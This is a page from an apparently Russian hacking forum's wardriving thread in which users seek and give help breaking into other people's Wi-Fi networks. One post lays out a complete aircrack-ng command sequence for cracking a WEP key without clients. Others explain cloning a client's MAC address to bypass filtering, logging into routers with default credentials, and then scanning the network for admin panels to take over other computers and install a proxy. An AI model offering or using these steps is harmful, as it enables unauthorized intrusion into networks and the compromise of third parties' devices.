[Wi-Fi, BT] Задай вопрос - получи ответ!

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by Alexsize, 11 Sep 2007.

Thread Status:
Not open for further replies.
  1. zuriuslev

    zuriuslev Member

    Joined:
    24 Dec 2011
    Messages:
    142
    Likes Received:
    19
    Reputations:
    20
    Как спровоцировть AP на data пакет

    Есть перспекивный AP с WEP, но не видать data пакетов и клиентов. :(
    Могу даже предположить IP адрес.
    Вопрос знатокам - как раскрутить точку хотябы на 4 пакета данных ? (Мне и 4 хватит :cool: )
     
  2. Machine

    Machine Elder - Старейшина

    Joined:
    23 Jun 2008
    Messages:
    403
    Likes Received:
    116
    Reputations:
    117
    Without clients:
    1 - Set the wireless card MAC address
    2 - Start the wireless interface in monitor mode on the specific AP channel
    3 - Use aireplay-ng to do a fake authentication with the access point
    4 - Use aireplay-ng chopchop or fragmentation attack to obtain PRGA
    5 - Use packetforge-ng to create an arp packet using the PRGA obtain in the previous step
    6 - Start airodump-ng on AP channel with filter for bssid to collect the new unique \
    7 - Inject the arp packet created in step 5
    8 - Run aircrack-ng to crack key using the IVs collected

    1. ifconfig wlan0 down
    macchanger --mac 00:11:22:33:44:55 wlan0

    2. airmon-ng start wlan0 9

    3. aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:11:22:33:44:55 mon0

    -1 means fake authentication
    0 reassociation timing in seconds
    -e teddy is the wireless network name
    -a 00:14:6C:7E:40:80 is the access point MAC address
    -h 00:11:22:33:44:55 is our card MAC address
    mon0 is the wireless interface name

    4. aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:11:22:33:44:55 mon0
    ...
    -5 means the fragmentation attack
    -b 00:14:6C:7E:40:80 is the access point MAC address
    -h 00:11:22:33:44:55 is the MAC address of our card and must match the MAC used in the fake authentication
    mon0 is the wireless interface name

    Success! The file ?fragment-0203-180343.xor? can then be used in the next step to generate an arp packet.
    If the fragmentation attack was not successful, you can then try the chopchop technique next. Run:

    aireplay-ng -4 -h 00:11:22:33:44:55 -b 00:14:6C:7E:40:80 mon0

    -4 means the chop-chop attack
    -b 00:14:6C:7E:40:80 is the access point MAC address
    -h 00:11:22:33:44:55 is the MAC address of our card and must match the MAC used in the fake authentication
    mon0 is the wireless interface name

    Success! The file ?replay_dec-0201-191706.xor? above can then be used in the next step to generate an arp packet.


    5. packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request

    -0 means generate an arp packet
    -a 00:14:6C:7E:40:80 is the access point MAC address
    -h 00:11:22:33:44:55 is MAC address of our card
    -k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)
    -l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255)
    -y fragment-0203-180343.xor is file to read the PRGA from
    -w arp-request is name of file to write the arp packet to

    The system will respond:
    Wrote packet to: arp-request

    6. airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w capture mon0

    7. Using the console session where you generated the arp packet, enter:
    aireplay-ng -2 -r arp-request mon0

    8. aircrack-ng -b 00:14:6C:7E:40:80 capture*.cap
    ======================================================================================
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -r capture-01.cap ath0
     
    1 person likes this.
  3. zuriuslev

    zuriuslev Member

    Joined:
    24 Dec 2011
    Messages:
    142
    Likes Received:
    19
    Reputations:
    20
    Спасибо кормилец ! :rolleyes:
    Уже для этого пункта нужен хоть какой-никакой, завалящий data пакет...
    Иначе дальше не двинется ... Не надо мне man-ы копипастить ... ;)
     
    #3683 zuriuslev, 20 Jan 2012
    Last edited by a moderator: 21 Jan 2012
  4. Machine

    Machine Elder - Старейшина

    Joined:
    23 Jun 2008
    Messages:
    403
    Likes Received:
    116
    Reputations:
    117
    Ну хорошо.

    Первое - красным (если это не статья) пишут только модеры.

    Второе - ты можешь ассоциировать себя с точкой, и сам нарегенить пакетов.

    Третье - не стоит думать, что ты открыл Америку, и до тебя этим вопросом никто не задавался.
     
  5. zuriuslev

    zuriuslev Member

    Joined:
    24 Dec 2011
    Messages:
    142
    Likes Received:
    19
    Reputations:
    20
    Первое - принято (Ку три раза ;) )

    Второе - А вот с этого места, можно подробнее ! Это как ? нагенерировать ???
    (Ассоциация работает, инжекция тоже, сигнал нормальный) Как генерить ???
    Третье - не понял ... :( если легко "нарегенить пакетов" подскажите пожалуйста ! КАК ?
    (На лавры Коллумба или Эрика рыжего не претендую)
     
    #3685 zuriuslev, 21 Jan 2012
    Last edited: 21 Jan 2012
  6. Machine

    Machine Elder - Старейшина

    Joined:
    23 Jun 2008
    Messages:
    403
    Likes Received:
    116
    Reputations:
    117
    В факе выше все написано.
     
  7. zuriuslev

    zuriuslev Member

    Joined:
    24 Dec 2011
    Messages:
    142
    Likes Received:
    19
    Reputations:
    20
    Уважаемый ! Если-бы можно мыло "нагенерить" валидных data пакетов, имея одни beacon. То все-бы только этим и занимались, а не пытались перехватывать реальные пакеты !
    Если Вы не в курсе или это не возможно, так и скажите.
    А не занимайтесь копипастом известной информации.

    Q
     
  8. Machine

    Machine Elder - Старейшина

    Joined:
    23 Jun 2008
    Messages:
    403
    Likes Received:
    116
    Reputations:
    117
    http://www.youtube.com/results?search_query=aircrack+%2B+wep+%2B+no+clients&oq=aircrack+%2B+wep+%2B+no+clients&aq=f&aqi=&aql=1&gs_sm=e&gs_upl=1577l12782l0l12947l31l31l2l9l1l1l263l3889l0.9.11l20l0

    В первом же мувике действия из фака продемонстрированы.
     
  9. zuriuslev

    zuriuslev Member

    Joined:
    24 Dec 2011
    Messages:
    142
    Likes Received:
    19
    Reputations:
    20
    Уважаемый ! Если-бы Вы были внимательны, то во всех примерах увидели-бы сообщение "Waiting for data packet" и только после получения data пакета, всё можно сдвинуть с мёртвой точки !
    А вот data пакетов нет ... совсем ...
    Спасибо за беспокойство, но Вы до сих пор не поняли сути вопроса :(
     
  10. YanTu

    YanTu New Member

    Joined:
    20 Oct 2010
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Так и не могу разобраться...
    В общем есть сеть ( IP-LINK HOME ) Открытая! Подключаюсь к ней, пишет: Без доступа к интернету. Как узнать фильтр по макам ли там? мак клиента подключаемого к сети есть, а вот как его присвоить своей карте и приконнектится, или же дело не в маке , а еще в чем то как проверить, можно инструкцию? МАС адрес на карте Alfa сначало в винде менялся нормально, а теперь вообще не хочет менять. В linux меняет. как с linuxa например с подменой мака подключится, хотя врятли там фильтр по макам. Еще есть сеть открытая , а подключение вообще не проходит, ничего не происходит, сигнал отличный, как понять где какая защита и как её обойти? Спасибо
     
  11. YanTu

    YanTu New Member

    Joined:
    20 Oct 2010
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Вот скрин, может поможет.

    [​IMG]
     
  12. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    779
    Likes Received:
    324
    Reputations:
    83
    Посмотри какой IP получает при подключении. Если стандартный 192* то значит там просто нет интернета. А если что-то типа 169* или если вообще не подключает то там защита по mac. Сканируешь точку и смотришь кто к ней подключаеться . Записываешь его mac. Ждешь когда он выходит или отключаешь его от точки. С помощью macchanger меняешь свой mac в linux на тот что записала и подключаешься к точке. Подключаться к точке мне нравиться больше всего через Wicd. Далее подключившись смотрите свой ip опять если он к примеру 192.168.1.2 то заходите через браузер на 192.168.1.1. Он вам скорее всего скажет что за модель роутера к которому вы хотите подрубится. В инете ищете стандартные логин и пароль к нему и логинетесь и добавляете свой mac в список разрешенных.
     
    1 person likes this.
  13. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,028
    Likes Received:
    518
    Reputations:
    285
    cardons молодец........ !


    кстати бенкон пакеты не идут када сигнал плохой надо быть по ближе к антенне , или использовать направленную трубу ...
     
  14. YanTu

    YanTu New Member

    Joined:
    20 Oct 2010
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Так, сейчас подключился к сетке IP: 192.168.0.27 , я так понял что нету там инета, так? тогда что за клиенты то и дело подключаются и отключаются? И вопрос такой как сменить в backtrack свой мак? вернее как задать определенный? а то только рандомный ставил.
     
  15. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,028
    Likes Received:
    518
    Reputations:
    285
    1. название провайдера
    2. желательно мен в аську стукнуть
    3. точка далеко - тут можно много расписывать вокруг да около ... в асю стукни или личку .. (что б не флудить)

    кстати ты читал фак по форуму и не один из вариантов не подошел ?
     
  16. YanTu

    YanTu New Member

    Joined:
    20 Oct 2010
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Хочу добавить что у точки на ip 192.168.0.2 весит DWL-3200AP - D-Link запрашивая логин и пасс, какие у него дефолтные знает кто?
     
  17. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    779
    Likes Received:
    324
    Reputations:
    83
    Логин admin без пароля. Ну или попробуй в оба вписать admin. Раз вам показывает страницу авторизацию роутера то нету там защиты по маку ) Иначе бы вас не пустило бы.
    Значит просто там сетка без инета ) Но и тут есть свои плюсы) Раз вы попали в сеть и особенно незащищенную сеть. То ищете к примеру все 80 порты в сети. И чекаете потом их на существования админ панелей,phpmyadmin и т.д... Через них ломаете другой комп это очень просто т.к. скорее всего стандартные логины пароли или их вообще нет и потом вешаете туда прокси и сидите через него ) В общем везде свои плюсы надо только их искать
     
    #3697 cardons, 22 Jan 2012
    Last edited: 22 Jan 2012
  18. BSTRDALEXXX

    BSTRDALEXXX New Member

    Joined:
    20 Sep 2011
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Аллюр, ребятки.

    У меня траблы, второю неделю бручу хендшейковый ключ от WPA. Кто нить поможет?
     
  19. Дэвид

    Дэвид New Member

    Joined:
    10 Jan 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Тут помогут: http://forum.antichat.ru/showthread.php?p=2990826#post2990826
     
  20. YanTu

    YanTu New Member

    Joined:
    20 Oct 2010
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    cardons Спасибо! Наставил на путь истеный:) Так вот, нашел я в этой сетке 2 компа с ip типа 192.168... Вот это интересует поподробнее
    чем лучше это сделать?
     
Loading...
Thread Status:
Not open for further replies.